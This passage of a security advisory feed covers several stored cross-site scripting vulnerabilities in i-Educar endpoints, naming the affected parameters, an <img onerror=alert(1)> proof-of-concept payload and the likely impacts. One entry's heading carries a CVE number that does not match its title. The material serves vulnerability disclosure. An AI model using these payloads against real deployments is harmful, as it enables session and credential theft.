&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8540/image.png&amp;#34;
	width=&amp;#34;629&amp;#34;
	height=&amp;#34;255&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8540/image_hu_359015b5f1096a2a.png 480w, /p/cve-2025-8540/image_hu_3bdd2dd3ec479caf.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;246&amp;#34;
		data-flex-basis=&amp;#34;592px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8540.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8540.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8541</title>
        <link>https://www.cvehunters.com/p/cve-2025-8541/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8541/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8541-cross-site-scripting-xss-stored-endpoint-public_uf_cadphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-8541: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;public_uf_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8541&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8541&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;public_uf_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;public_uf_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8541-cross-site-scripting-xss-stored-endpoint-public_uf_cadphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-8541: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;public_uf_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8541&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8541&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;public_uf_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;public_uf_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(1)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8541/image.png&amp;#34;
	width=&amp;#34;622&amp;#34;
	height=&amp;#34;277&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8541/image_hu_18e90d6158627beb.png 480w, /p/cve-2025-8541/image_hu_cbe4a54f17fc1f35.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;224&amp;#34;
		data-flex-basis=&amp;#34;538px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8541.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8541.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8542</title>
        <link>https://www.cvehunters.com/p/cve-2025-8542/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8542/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8508-multiples-cross-site-scripting-xss-stored-in-endpoint-empresas_cadphp&amp;#34;&amp;gt;CVE-2025-8508: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;empresas_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8542&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8542&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;empresas_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;fantasia&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;razao_social&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;empresas_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8508-multiples-cross-site-scripting-xss-stored-in-endpoint-empresas_cadphp&amp;#34;&amp;gt;CVE-2025-8508: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;empresas_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8542&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8542&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;empresas_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;fantasia&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;razao_social&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;empresas_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;fantasia&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;razao_social&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;fantasia&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;razao_social&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(1)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8542/image.png&amp;#34;
	width=&amp;#34;612&amp;#34;
	height=&amp;#34;242&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8542/image_hu_7e7a148fcd72d209.png 480w, /p/cve-2025-8542/image_hu_ebe59eb9954b9d45.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parameter “fantasia”&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;252&amp;#34;
		data-flex-basis=&amp;#34;606px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8542/image-1.png&amp;#34;
	width=&amp;#34;638&amp;#34;
	height=&amp;#34;246&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8542/image-1_hu_6d47618d6d2bc8d0.png 480w, /p/cve-2025-8542/image-1_hu_e2e58bf53ac570b9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parameter “razao_social”&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;259&amp;#34;
		data-flex-basis=&amp;#34;622px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8542.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8542.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8543</title>
        <link>https://www.cvehunters.com/p/cve-2025-8543/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8543/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8543-cross-site-scripting-xss-stored-endpoint-educar_raca_cadphp-parameter-nm_raca&amp;#34;&amp;gt;CVE-2025-8543: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_raca_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;nm_raca&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8543&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8543&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_raca_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_raca&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
